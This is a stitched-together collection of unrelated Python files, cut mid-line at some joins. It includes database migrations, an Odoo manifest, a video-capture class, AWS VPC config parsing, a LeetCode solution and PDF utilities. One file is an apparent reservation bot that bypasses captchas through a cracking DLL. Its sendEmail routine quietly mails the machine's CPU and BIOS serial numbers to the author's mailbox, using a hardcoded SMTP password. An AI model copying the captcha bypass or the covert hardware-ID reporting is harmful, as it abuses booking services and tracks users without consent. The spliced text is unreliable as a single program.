Candi_reg2.write(line0_reg_ds9)
Candi_reg2.write(line1_reg_ds9)
for i in range(len(info_candi_2)):
Candi_reg2.write("circle(%f, %f, 16.0\") # color=green text={NOMAD1_%d}\n" %(info_candi_2["ra"][i], info_candi_2["dec"][i], i))
Candi_reg2.close()
print("Number of Candidate %d" %len(info_candi_2))
print("\n"*2)
except(ValueError, NameError):
print("No c | andidate in NOMAD1\n\n")
stop = timeit.default_timer()
runtime = stop - start
print("\nRuntime = %2.2f" %runtime)
#graph0 = candidateplot(TAROT_data.tbdata,XYcandi['Xpix'],XYcandi['Ypix'], 'Candidate by angular separation')
|
"""alter database for mysql compatibility
Revision ID: 9be372ec38bc
Revises: 4328f2c08f05
Create Date: 2020-02-16 15:43:35.276655
"""
from alembic import op
import sqlalchemy as sa
from docassemble.webapp.database import dbtableprefix, dbprefix, daconfig
import sys
# revision identifiers, used by Alembic.
revision = '9be372ec38bc'
down_revision = '4328f2c08f05'
branch_labels = None
depends_on = None
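# Applied with "alembic upgrade head"; "alembic downgrade 4328f2c08f05"
# reverses the column type changes via downgrade() below.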
def upgrade():
if dbprefix.startswith('postgresql') and not daconfig.get('force text to varchar upgrade', False):
sys.stderr.write("Not changing text type to varchar type because underlying database is PostgreSQL\n")
else:
op.alter_column(
table_name='userdict',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='userdictkeys',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='chatlog',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='uploads',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='uploads',
column_name='yamlfile',
type_=sa.String(255)
)
op.alter_column(
table_name='objectstorage',
column_name='key',
type_=sa.String(1024)
)
op.alter_column(
table_name='speaklist',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='shortener',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='shortener',
column_name='key',
type_=sa.String(255)
)
op.alter_column(
table_name='machinelearning',
column_name='key',
type_=sa.String(1024)
)
op.alter_column(
table_name='machinelearning',
column_name='group_id',
type_=sa.String(1024)
)
op.alter_column(
table_name='globalobjectstorage',
column_name='key',
type_=sa.String(1024)
)
op.create_index(dbtableprefix + 'ix_uploads_yamlfile', 'uploads', ['yamlfile'])
def downgrade():
op.alter_column(
table_name='userdict',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='userdictkeys',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='chatlog',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='uploads',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='uploads',
column_name='yamlfile',
type_=sa.Text()
)
op.alter_column(
table_name='objectstorage',
column_name='key',
type_=sa.Text()
)
op.alter_column(
table_name='speaklist',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='shortener',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='shortener',
column_name='key',
type_=sa.Text()
)
op.alter_column(
table_name='machinelearning',
column_name='key',
type_=sa.Text()
)
op.alter_column(
table_name='machinelearning',
column_name='group_id',
type_=sa.Text()
)
op.alter_column(
table_name='globalobjectstorage',
column_name='key',
type_=sa.Text()
)
op.drop_index(dbtableprefix + 'ix_uploads_yamlfile', table_name='uploads')
|
# -*- coding: utf-8 -*-
##############################################################################
#
# This file is part of CampOS Event,
# an Odoo module.
#
# Copyright (c) 2015 Stein & Gabelgaard ApS
# http://www.steingabelgaard.dk
# Hans Henrik Gabelgaard
#
# CampOS Event is free software:
# you can redistribute it and/or modify it under the terms of the GNU
# Affero General Public License as published by the Free Software
# Foundation, either version 3 of the License, or (at your option) any
# later version.
#
# CampOS Event is distributed
# in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
# even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR
# PURPOSE. See the GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with CampOS Event.
# If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': "CampOS Event",
'summary': """
Scout Camp Management Solution""",
# 'description': put the module description in README.rst
'author': "Hans Henrik Gabelgaard",
'website': "http://www.steingabelgaard.dk",
# Categories can be used to filter modules in modules listing
# Check http://goo.gl/0TfwzD for the full list
'category': 'Uncategorized',
'version': '0.1',
'license': 'AGPL-3',
# any module necessary for this one to work correctly
'depends': [
'base',
'mail',
'event',
'website',
'portal',
'survey',
'website_event_register_free',
'base_suspend_security',
'website_jquery_ui',
'base_geoengine',
'geoengine_partner',
'web_widget_color',
'project_issue',
'project_model_to_issue',
'website_event_track',
'web_widget_datepicker_options',
],
# always loaded
'data': [
'views/res_country.xml',
'views/product_template.xml',
'views/campos_staff_del_prod.xml',
'security/campos_event_security.xml',
'security/campos_subcamp_exception.xml',
'security/campos_subcamp.xml',
'security/campos_registration_view.xml',
'security/campos_function_view.xml',
'security/ir.model.access.csv',
'security/ir.rule.csv',
'security/campos_staff_del_prod.xml',
'data/campos.municipality.csv',
'data/campos.scout.org.csv',
'data/job_ask_project.xml',
'views/templates.xml',
'views/participant_view.xml',
'views/event_registration_view.xml',
'views/committee_view.xml',
'views/municipality_view.xml',
"views/scout_org_view.xml",
"views/res_partner_view.xml",
"views/job_view.xml",
"views/job_template.xml",
"views/mail_templates.xml",
"views/confirm_template.xml",
"views/event_view.xml",
#"views/portal_menu.xml",
"views/res_users_view.xml",
'views/campos_menu.xml',
'views/campos_subcamp_exception.xml',
'views/campos_subcamp.xml',
'views/event_partner_reg_template.xml',
'views/meeting_proposal_template.xml',
'views/event_track_view.xml',
'views/campos_camp_area.xml',
'data/camp_area_committee.xml',
'data/participant_number.xml',
'security/campos_par_tag.xml',
'views/campos_par_tag.xml',
'security/campos_reg_tag.xml',
'views/campos_reg_tag.xml',
'views/extern_jobber_template.xml',
],
# only loaded in demonstration mode
'demo': [
'demo.xml',
],
}
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# IkaLog
# ======
# Copyright (C) 2015 Takeshi HASEGAWA
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import time
import threading
import cv2
from ikalog.utils import *
from ikalog.inputs.win.videoinput_wrapper import VideoInputWrapper
from ikalog.inputs import VideoInput
class DirectShow(VideoInput):
# override
def _enumerate_sources_func(self):
return self._videoinput_wrapper.get_device_list()
def read_raw(self):
if self._device_id is None:
return None
frame = self._videoinput_wrapper.get_pixels(
self._device_id,
parameters=(
self._videoinput_wrapper.VI_BGR +
self._videoinput_wrapper.VI_VERTICAL_FLIP
)
)
return frame
# override
def _read_frame_func(self):
frame = self.read_raw()
return frame
# override
def _initialize_driver_func(self):
pass
# override
def _cleanup_driver_func(self):
pass
# override
def _is_active_func(self):
return (self._device_id is not None)
# override
def _select_device_by_index_func(self, source, width=1280, height=720, framerate=59.94):
device_id = int(source)
vi = self._videoinput_wrapper
self.lock.acquire()
try:
if self._device_id is not None:
raise Exception('Need to deinit the device')
formats = [
{'width': width, 'height': height, 'framerate': None},
{'width': width, 'height': height, 'framerate': framerate},
]
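# First try the requested resolution without forcing a framerate, then
# retry with the explicit framerate; the first format whose init sticks
# (or any init, when optimal resolution is not required) wins the loop.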
for fmt in formats:
if fmt['framerate']:
vi.set_framerate(device_id, fmt['framerate'])
retval = vi.init_device(
device_id,
flags=self._videoinput_wrapper.DS_RESOLUTION,
width=fmt['width'],
height=fmt['height'],
)
if retval:
self._source_width = vi.get_frame_width(device_id)
self._source_height = vi.get_frame_height(device_id)
success = \
(width == self._source_width) and (
height == self._source_height)
if success or (not self.cap_optimal_input_resolution):
self._device_id = device_id
break
vi.deinit_device(device_id)
# end of for loop
if self._device_id is None:
IkaUtils.dprint(
'%s: Failed to init the capture device %d' %
(self, device_id)
)
finally:
self.lock.release()
# override
def _select_device_by_name_func(self, source):
IkaUtils.dprint('%s: Select device by name "%s"' % (self, source))
try:
index = self.enumerate_sources().index(source)
except ValueError:
IkaUtils.dprint('%s: Input "%s" not found' % (self, source))
return False
IkaUtils.dprint('%s: "%s" -> %d' % (self, source, index))
self._select_device_by_index_func(index)
def __init__(self):
self.strict_check = False
self._device_id = None
self._warned_resolution = False
self._videoinput_wrapper = VideoInputWrapper()
super(DirectShow, self).__init__()
if __name__ == "__main__":
obj = DirectShow()
list = obj.enumerate_sources()
for n in range(len(list)):
IkaUtils.dprint("%d: %s" % (n, list[n]))
dev = input("Please input number (or name) of capture device: ")
obj.select_source(dev)
k = 0
while k != 27:
frame = obj.read_frame()
if frame is not None:
cv2.imshow(obj.__class__.__name__, frame)
k = cv2.waitKey(1)
if k == ord('s'):
import time
cv2.imwrite('screenshot_%d.png' % int(time.time()), frame)
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2010 OpenStack LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License
from keystone.contrib.extensions.admin.osksadm.extension_handler\
import ExtensionHandler as KSADMExtensionHandler
from keystone.contrib.extensions.admin.oskscatalog.extension_handler\
import ExtensionHandler as KSCATALOGExtensionHandler
def configure_extensions(mapper, options):
#TODO: Make extensions configurable.
ksadm_extension_handler = KSADMExtensionHandler()
ksadm_extension_handler.map_extension_methods(mapper, options)
kscatalog_extension_handler = KSCATALOGExtensionHandler()
kscatalog_extension_handler.map_extension_methods(mapper, options)
|
# -*- coding: utf-8 -*-
import copy
import netaddr
from opinel.utils.aws import get_name
from opinel.utils.globals import manage_dictionary
from opinel.utils.fs import load_data, read_ip_ranges
from AWSScout2.utils import ec2_classic, get_keys
from AWSScout2.configs.regions import RegionalServiceConfig, RegionConfig
from AWSScout2.configs.vpc import VPCConfig as SingleVPCConfig
########################################
# Globals
########################################
protocols_dict = load_data('protocols.json', 'protocols')
########################################
# VPCRegionConfig
########################################
class VPCRegionConfig(RegionConfig):
"""
VPC configuration for a single AWS region
"""
def parse_customer_gateway(self, global_params, region, cgw):
cgw['id'] = cgw.pop('CustomerGatewayId')
self.customer_gateways[cgw['id']] = cgw
def parse_flow_log(self, global_params, region, fl):
"""
:param global_params:
:param region:
:param fl:
:return:
"""
get_name(fl, fl, 'FlowLogId')
fl_id = fl.pop('FlowLogId')
self.flow_logs[fl_id] = fl
def parse_network_acl(self, global_params, region, network_acl):
"""
:param global_params:
:param region:
:param network_acl:
:return:
"""
vpc_id = network_acl['VpcId']
network_acl['id'] = network_acl.pop('NetworkAclId')
get_name(network_acl, network_acl, 'id')
manage_dictionary(network_acl, 'rules', {})
network_acl['rules']['ingress'] = self.__parse_network_acl_entries(network_acl['Entries'], False)
network_acl['rules']['egress'] = self.__parse_network_acl_entries(network_acl['Entries'], True)
network_acl.pop('Entries')
# Save
manage_dictionary(self.vpcs, vpc_id, SingleVPCConfig(self.vpc_resource_types))
self.vpcs[vpc_id].network_acls[network_acl['id']] = network_acl
def __parse_network_acl_entries(self, entries, egress):
"""
:param entries:
:param egress:
:return:
"""
acl_dict = {}
for entry in entries:
if entry['Egress'] == egress:
acl = {}
for key in ['RuleAction', 'RuleNumber']:
acl[key] = entry[key]
acl['CidrBlock'] = entry['CidrBlock'] if 'CidrBlock' in entry else entry['Ipv6CidrBlock']
acl['protocol'] = protocols_dict[entry['Protocol']]
if 'PortRange' in entry:
from_port = entry['PortRange']['From'] if entry['PortRange']['From'] else 1
to_port = entry['PortRange']['To'] if entry['PortRange']['To'] else 65535
acl['port_range'] = from_port if from_port == to_port else str(from_port) + '-' + str(to_port)
else:
acl['port_range'] = '1-65535'
acl_dict[acl.pop('RuleNumber')] = acl
return acl_dict
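# Shape of the result (hypothetical entry): a TCP "allow" rule number 100
# for 10.0.0.0/16 ports 80-443 becomes
#   acl_dict[100] = {'RuleAction': 'allow', 'CidrBlock': '10.0.0.0/16',
#                    'protocol': 'tcp', 'port_range': '80-443'}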
def parse_route_table(self, global_params, region, rt):
route_table = {}
vpc_id = rt['VpcId']
get_name(rt, route_table, 'VpcId') # TODO: change get_name to have src then dst
get_keys(rt, route_table, ['Routes', 'Associations', 'PropagatingVgws'])
# Save
manage_dictionary(self.vpcs, vpc_id, SingleVPCConfig(self.vpc_resource_types))
self.vpcs[vpc_id].route_tables[rt['RouteTableId']] = route_table
def parse_subnet(self, global_params, region, subnet):
"""
:param global_params:
:param region:
:param subnet:
:return:
"""
vpc_id = subnet['VpcId']
manage_dictionary(self.vpcs, vpc_id, SingleVPCConfig(self.vpc_resource_types))
subnet_id = subnet['SubnetId']
get_name(subnet, subnet, 'SubnetId')
subnet['flow_logs'] = []
# Save
manage_dictionary(self.vpcs, vpc_id, SingleVPCConfig(self.vpc_resource_types))
self.vpcs[vpc_id].subnets[subnet_id] = subnet
def parse_vpc(self, global_params, region_name, vpc):
"""
:param global_params:
:param region_name:
:param vpc:
:return:
"""
vpc_id = vpc['VpcId']
# Save
manage_dictionary(self.vpcs, vpc_id, SingleVPCConfig(self.vpc_resource_types))
self.vpcs[vpc_id].name = get_name(vpc, {}, 'VpcId')
def parse_vpn_connection(self, global_params, region_name, vpnc):
vpnc['id'] = vpnc.pop('VpnConnectionId')
self.vpn_connections[vpnc['id']] = vpnc
def parse_vpn_gateway(self, global_params, region_name, vpng):
vpng['id'] = vpng.pop('VpnGatewayId')
self.vpn_gateways[vpng['id']] = vpng
########################################
# VPCConfig
########################################
class VPCConfig(RegionalServiceConfig):
"""
VPC configuration for all AWS regions
"""
region_config_class = VPCRegionConfig
def __init__(self, service_metadata, thread_config):
super(VPCConfig, self).__init__(service_metadata, thread_config)
########################################
##### VPC analysis functions
########################################
#
# Add a display name for all known CIDRs
#
known_cidrs = {'0.0.0.0/0': 'All'}
def put_cidr_name(aws_config, current_config, path, current_path, resource_id, callback_args):
if 'cidrs' in current_config:
cidr_list = []
for cidr in current_config['cidrs']:
if type(cidr) == dict:
cidr = cidr['CIDR']
if cidr in known_cidrs:
cidr_name = known_cidrs[cidr]
else:
cidr_name = get_cidr_name(cidr, callback_args['ip_ranges'], callback_args['ip_ranges_name_key'])
known_cidrs[cidr] = cidr_name
cidr_list.append({'CIDR': cidr, 'CIDRName': cidr_name})
current_config['cidrs'] = cidr_list
#
# Read display name for CIDRs from ip-ranges files
#
aws_ip_ranges = {} # read_ip_ranges(aws_ip_ranges_filename, False)
def get_cidr_name(cidr, ip_ranges_files, ip_ranges_name_key):
for filename in ip_ranges_files:
ip_ranges = read_ip_ranges(filename, local_file = True)
for ip_range in ip_ranges:
ip_prefix = netaddr.IPNetwork(ip_range['ip_prefix'])
cidr = netaddr.IPNetwork(cidr)
if cidr in ip_prefix:
return ip_range[ip_ranges_name_key].strip()
for ip_range in aws_ip_ranges:
ip_prefix = netaddr.IPNetwork(ip_range['ip_prefix'])
cidr = netaddr.IPNetwork(cidr)
if cidr in ip_prefix:
return 'Unknown CIDR in %s %s' % (ip_range['service'], ip_range['region'])
return 'Unknown CIDR'
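# Containment test used above, illustrated with hypothetical values: a
# netaddr.IPNetwork is "in" another when its address range is fully covered.
#   netaddr.IPNetwork('10.0.1.0/24') in netaddr.IPNetwork('10.0.0.0/8')   # True
#   netaddr.IPNetwork('10.0.0.0/8') in netaddr.IPNetwork('10.0.1.0/24')   # False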
#
# Propagate VPC names in VPC-related services (info only fetched during EC2 calls)
#
def propagate_vpc_names(aws_config, current_config, path, current_path, resource_id, callback_args):
if resource_id == ec2_classic:
current_config['name'] = ec2_classic
else:
target_path = copy.deepcopy(current_path)
target_path[1] = 'ec2'
target_path.append(resource_id)
target_path.append('Name')
target_path = '.'.join(target_path)
current_config['name'] = get_value_at(aws_config, target_path, target_path)
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('organizations', '0002_migrate_locations_to_facilities'),
('notifications', '0003_auto_20150912_2049'),
]
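# Three-step rename: relabel the old column, rename it, then drop the
# now-redundant verbose_name so the field is simply "facility".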
operations = [
migrations.AlterField(
model_name='notification',
name='location',
field=models.ForeignKey(verbose_name='facility', to='organizations.Facility'),
),
migrations.RenameField(
model_name='notification',
old_name='location',
new_name='facility',
),
migrations.AlterField(
model_name='notification',
name='facility',
field=models.ForeignKey(to='organizations.Facility'),
),
]
|
#__author__ = 'hello'
# -*- coding: cp936 -*-
import re
import os
import random
import json
import string
import ctypes
from myexception import *
PATH = './img/'
dm2 = ctypes.WinDLL('./CrackCaptchaAPI.dll')
if not os.path.exists('./img'):
os.mkdir('./img')
def str_tr(content):
instr = "0123456789"
outstr ="QAEDTGUJOL"
trantab = string.maketrans(instr,outstr)
return content.translate(trantab)
def getHid():
import wmi
m = wmi.WMI()
a = ''
b = ''
for cpu in m.Win32_Processor():
a = cpu.Processorid.strip()
for bd in m.Win32_BIOS():
b= bd.SerialNumber.strip()
return a+b
def getEightRandomString():
return ''.join(random.sample(string.ascii_letters,8))
def getCToken(content):
s = ''
pattern = re.compile('securityCToken = "([+-]?\d*)"')
match = pattern.search(content)
if match:
s = match.group(1)
return s
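# Example (hypothetical page content): a body containing
#   securityCToken = "-123456789"
# makes getCToken return "-123456789"; with no match it returns ''.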
def GetCaptcha(content):
global PATH
filename = ''.join(random.sample(string.ascii_letters,8))
filename += '.jpg'
filename = PATH+filename
img = None
try:
img = open(filename,'wb')
img.write(content)
except IOError:
raise FileCanNotCreate('open file error')
finally:
if img:
img.close()
dm2.D2File.argtypes=[ctypes.c_char_p, ctypes.c_char_p, ctypes.c_char_p, ctypes.c_char_p, ctypes.c_short, ctypes.c_int, ctypes.c_char_p]
dm2.D2File.restype = ctypes.c_int
key = ctypes.c_char_p('fa6fd217145f273b59d7e72c1b63386e')
id = ctypes.c_long(54)
user = ctypes.c_char_p('test')
pas = ctypes.c_char_p('test')
timeout = ctypes.c_short(30)
result = ctypes.create_string_buffer('\0' * 100)
ret = -1
ret = dm2.D2File(key,user, pas, filename,timeout,id,(result))
if ret > 0:
return result.value
elif ret == -101:
raise D2FILE(u'Insufficient balance, recharge required')
elif ret > -199:
raise D2FILE('user info error')
elif ret == -208:
raise D2FILE('software cannot be used')
elif ret == -210:
raise D2FILE('invalid user')
elif ret == -301:
raise D2FILE('can not find dll')
else:
raise D2FILE(u'Recognition library error')
def GetTimeSlot(content,num):
try:
timeslot = json.loads(content)
slotLen = len(timeslot['timeSlots'])
if num < slotLen:
return timeslot['timeSlots'][num]['startTime'], timeslot['timeSlots'][num]['timeslotID']
elif slotLen > 0:
return timeslot['timeSlots'][slotLen-1]['startTime'], timeslot['timeSlots'][slotLen-1]['timeslotID']
except ValueError,e:
raise NoJsonData('')
def sendEmail(count):
import smtplib
from email.mime.text import MIMEText
from email.header import Header
smtpserver = 'smtp.163.com'
sender = 'sghcarbon@163.com'
receiver = 'sghcarbon@163.com'
subject = u'Number of reservations'
user = 'sghcarbon'
pas = 'carbon216'
content = getHid()+u'Number of reservations:'+str(count)
msg = MIMEText(content,'plain','utf-8')
msg['Subject'] = Header(subject,'utf-8')
msg['From'] = sender
msg['To'] = receiver
try:
send_smtp = smtplib.SMTP()
send_smtp.connect(smtpserver)
send_smtp.login(user,pas)
send_smtp.sendmail(sender,receiver,msg.as_string())
send_smtp.close()
print 'ok'
except:
print 'error'
|
class Solution(object):
def findPaths(self, m, n, N, i, j):
"""
:type m: int
:type n: int
:type N: int
:type i: int
:type j: int
:rtype: int
"""
MOD = 1000000007
paths = 0
cur = {(i, j): 1}
for i in xrange(N):
next = collections.defaultdict(int)
for (x, y), cnt in cur.iteritems():
for dx, dy in [[-1, 0], [0, 1], [1, 0], [0, -1]]:
nx = x + dx
ny = y + dy
if nx < 0 or ny < 0 or nx >= m or ny >= n:
paths += cnt
paths %= MOD
else:
next[(nx, ny)] += cnt
next[(nx, ny)] %= MOD
cur = next
return paths
# 94 / 94 test cases passed.
# Status: Accepted
# Runtime: 232 ms
# beats 75.36 %
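# Worked example: m=2, n=2, N=2, start at (0, 0) -> 6, i.e. 2 one-move exits
# (up, left) plus 2 two-move exits via (0, 1) and 2 via (1, 0).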
|
h = (ay - y + h)
return x, (ay - y - h), w, h
return x, (ay - y)
def getBox(box, pagesize):
"""
Parse sizes by corners in the form:
<X-Left> <Y-Upper> <Width> <Height>
The last two values, when negative, are interpreted as offsets from
the right and lower borders.
"""
box = str(box).split()
if len(box) != 4:
raise Exception, "box not defined right way"
x, y, w, h = map(getSize, box)
return getCoords(x, y, w, h, pagesize)
def getPos(position, pagesize):
"""
Pair of coordinates
"""
position = str(position).split()
if len(position) != 2:
raise Exception, "position not defined right way"
x, y = map(getSize, position)
return getCoords(x, y, None, None, pagesize)
def getBool(s):
" Is it a boolean? "
return str(s).lower() in ("y", "yes", "1", "true")
_uid = 0
def getUID():
" Unique ID "
global _uid
_uid += 1
return str(_uid)
_alignments = {
"left": TA_LEFT,
"center": TA_CENTER,
"middle": TA_CENTER,
"right": TA_RIGHT,
"justify": TA_JUSTIFY,
}
def getAlign(value, default=TA_LEFT):
return _alignments.get(str(value).lower(), default)
#def getVAlign(value):
# # Unused
# return str(value).upper()
GAE = "google.appengine" in sys.modules
if GAE:
STRATEGIES = (
StringIO.StringIO,
StringIO.StringIO)
else:
STRATEGIES = (
StringIO.StringIO,
tempfile.NamedTemporaryFile)
class pisaTempFile(object):
"""A temporary file implementation that uses memory unless
either capacity is breached or fileno is requested, at which
point a real temporary file will be created and the relevant
details returned
If capacity is -1 the second strategy will never be used.
Inspired by:
http://code.activestate.com/recipes/496744/
"""
STRATEGIES = STRATEGIES
CAPACITY = 10 * 1024
def __init__(self, buffer="", capacity=CAPACITY):
"""Creates a TempFile object containing the specified buffer.
If capacity is specified, we use a real temporary file once the
file gets larger than that size. Otherwise, the data is stored
in memory.
"""
#if hasattr(buffer, "read"):
#shutil.copyfileobj( fsrc, fdst[, length])
self.capacity = capacity
self.strategy = int(len(buffer) > self.capacity)
try:
self._delegate = self.STRATEGIES[self.strategy]()
except:
# Fallback for Google AppEngine etc.
self._delegate = self.STRATEGIES[0]()
self.write(buffer)
def makeTempFile(self):
" Switch to next startegy. If an error occured stay with the first strategy "
if self.strategy == 0:
try:
new_delegate = self.STRATEGIES[1]()
new_delegate.write(self.getvalue())
self._delegate = new_delegate
self.strategy = 1
log.warn("Created temporary file %s", self.name)
except:
self.capacity = - 1
def getFileName(self):
" Get a named temporary file "
self.makeTempFile()
return self.name
def fileno(self):
"""Forces this buffer to use a temporary file as the underlying.
object and returns the fileno associated with it.
"""
self.makeTempFile()
return self._delegate.fileno()
def getvalue(self):
" Get value of file. Work around for second strategy "
if self.strategy == 0:
return self._delegate.getvalue()
self._delegate.flush()
self._delegate.seek(0)
return self._delegate.read()
def write(self, value):
" If capacity != -1 and length of file > capacity it is time to switch "
if self.capacity > 0 and self.strategy == 0:
len_value = len(value)
if len_value >= self.capacity:
needs_new_strategy = True
else:
self.seek(0, 2) # find end of file
needs_new_strategy = \
(self.tell() + len_value) >= self.capacity
if needs_new_strategy:
self.makeTempFile()
self._delegate.write(value)
def __getattr__(self, name):
try:
return getattr(self._delegate, name)
except AttributeError:
# hide the delegation
e = "object '%s' has no attribute '%s'" \
% (self.__class__.__name__, name)
raise AttributeError(e)
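# Usage sketch (hypothetical sizes): writes below CAPACITY stay in StringIO;
# crossing it, or asking for fileno()/getFileName(), migrates to a real file.
#   buf = pisaTempFile(capacity=16)
#   buf.write("0123456789")   # in memory (strategy 0)
#   buf.write("0123456789")   # total exceeds capacity -> temp file (strategy 1)
#   data = buf.getvalue()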
_rx_datauri = re.compile("^data:(?P<mime>[a-z]+/[a-z]+);base64,(?P<data>.*)$", re.M | re.DOTALL)
class pisaFileObject:
"""
XXX
"""
def __init__(self, uri, basepath=None):
self.basepath = basepath
self.mimetype = None
self.file = None
self.data = None
self.uri = None
self.local = None
self.tmp_file = None
uri = str(uri)
log.debug("FileObject %r, Basepath: %r", uri, basepath)
# Data URI
if uri.startswith("data:"):
m = _rx_datauri.match(uri)
self.mimetype = m.group("mime")
self.data = base64.decodestring(m.group("data"))
else:
# Check if we have an external scheme
if basepath and not (uri.startswith("http://") or uri.startswith("https://")):
urlParts = urlparse.urlparse(basepath)
else:
urlParts = urlparse.urlparse(uri)
log.debug("URLParts: %r", urlParts)
# Drive letters have len==1 but we are looking for things like http:
if len(urlParts[0]) > 1 :
# External data
if basepath:
uri = urlparse.urljoin(basepath, uri)
#path = urlparse.urlsplit(url)[2]
#mimetype = getMimeType(path)
# Using HTTPLIB
server, path = urllib.splithost(uri[uri.find("//"):])
if uri.startswith("https://"):
conn = httplib.HTTPSConnection(server)
else:
conn = httplib.HTTPConnection(server)
conn.request("GET", path)
r1 = conn.getresponse()
# log.debug("HTTP %r %r %r %r", server, path, uri, r1)
if (r1.status, r1.reason) == (200, "OK"):
# data = r1.read()
self.mimetype = r1.getheader("Content-Type", None).split(";")[0]
self.uri = uri
if r1.getheader("content-encoding") == "gzip":
# zbuf = cStringIO.StringIO(data)
import gzip
self.file = gzip.GzipFile(mode="rb", fileobj=r1)
#data = zfile.read()
#zfile.close()
else:
self.file = r1
# self.file = urlResponse
else:
urlResponse = urllib2.urlopen(uri)
self.mimetype = urlResponse.info().get("Content-Type", None).split(";")[0]
self.uri = urlResponse.geturl()
self.file = urlResponse
else:
# Local data
if basepath:
uri = os.path.normpath(os.path.join(basepath, uri))
if os.path.isfile(uri):
self.uri = uri
self.local = uri
self.setMimeTypeByName(uri)
self.file = open(uri, "rb")
def getFile(self):
if self.file is not None:
return self.file
if self.data is not None:
return pisaTempFile(self.data)
return None
def getNamedFile(self):
if self.notFound():
return None
if self.local:
return str(self.local)
if not self.tmp_file:
self.tmp_ |
#!/usr/bin/python
import sys, os, re
import json
import argparse
import pprint
arg_parser = argparse.ArgumentParser(description='Define tests')
arg_parser.add_argument('-p', '--pretty-print', action="store_true", help="select human friendly output, default is CSV")
arg_parser.add_argument('-i', '--info', action="store_true", help="show info about the data available in the specified directory")
arg_parser.add_argument('-k', '--show-keys', action="store_true", help="show available keys")
arg_parser.add_argument('-a', '--all-connections', action="store_true", help="extract results for all connections")
arg_parser.add_argument('-c', '--concurrent', default=0, help="filter results with specified concurrency", type=int)
arg_parser.add_argument('in_dir', help="Input directory containing JSON files")
arg_parser.add_argument('keys', nargs=argparse.REMAINDER, help="keys to extract")
args = arg_parser.parse_args()
def load_json(fname):
return json.load(open(fname, "r"))
def load_all(src_dir):
data = {}
file_list = os.listdir(src_dir)
for f in file_list:
if not os.path.splitext(f)[1] == ".json":
continue
fp = os.path.join(src_dir, f)
try:
data[f] = load_json(fp)
except ValueError:
print("Skipping corrupted file: %s" % f)
continue
return data
def dotkey(tree_root, dotted_key):
dotted_key = dotted_key.split(".")
value = tree_root
for key in dotted_key:
value = value[key]
return value
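# Example (hypothetical tree): dotkey({"a": {"b": {"c": 1}}}, "a.b.c") -> 1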
def get_keys(f):
keys = []
t = data[f]
unvisited = list(t.keys())
while len(unvisited) > 0:
k = unvisited.pop()
child = dotkey(t, k)
if type(child) != dict:
keys.append(k)
else:
for kname in child.keys():
unvisited.append(k+"."+kname)
return keys
# unvisited += t[k]
# values = []
# k = key.split(".")
# for d in data:
# values.append(get_value(d, k))
# return values
def print_csv_header(columns):
out = "measurement"
for title in columns:
out += ", " + title
print(out)
def get_values_measurement(tree, keys):
out = []
for key in keys:
try:
out.append(dotkey(tree, key))
except KeyError:
out.append("N/A")
return out
def print_values(measure, values):
if args.pretty_print:
print("Measure: %s" % measure)
for v in values:
print("\t%s" % (v,))
else:
s = measure
for v in values:
s += "," + str(v)
print(s)
def expand_keys(template_measure):
"""For each key that contains conn_N will add all other conn_* keys with the
same suffix"""
new_keys = args.keys[:]
all_keys = get_keys(template_measure)
for ukey in args.keys:
match = re.search(r"conn_[0-9]+\.", ukey)
if match:
suffix = ukey[match.end():]
new_keys.remove(ukey)
for skey in all_keys:
if re.search(suffix+"$", skey):
new_keys.append(skey)
return new_keys
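# Example (hypothetical keys): if the data holds conn_0.rtt and conn_1.rtt,
# requesting "conn_0.rtt" expands to both keys sharing the ".rtt" suffix.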
def filter_measures(data, concurrent):
"""Return a filtered data dictionary containing only the selected concurrent number"""
measures = list(data.keys())
for measure in measures:
conc = get_values_measurement(data[measure], ["concurrent"])[0]
if conc != concurrent:
del data[measure]
return data
data = load_all(args.in_dir)
if args.info:
descrs = get_all_values("name")
print("These measurements are available:")
for d in sorted(descrs, key=lambda x: int(x.split("_")[0])):
print(d, ":", descrs[d][0])
sys.exit(0)
if args.show_keys:
f = sorted(data.keys())[-1]
print("Reading keys from file %s" % f)
ks = get_keys(f)
for k in sorted(ks):
print(k)
sys.exit(0)
if args.all_connections and args.concurrent == 0:
print("Error: -a requires -c")
sys.exit(1)
if args.concurrent != 0:
data = filter_measures(data, args.concurrent)
if args.all_connections:
new_keys = expand_keys(list(data.keys())[0])
else:
new_keys = args.keys[:]
if not args.pretty_print:
print_csv_header(new_keys)
for measure in data.keys():
values = get_values_measurement(data[measure], new_keys)
print_values(measure, values)
|
alternative_gp.append(gp.lower())
# Comment out the line below to test the source updater
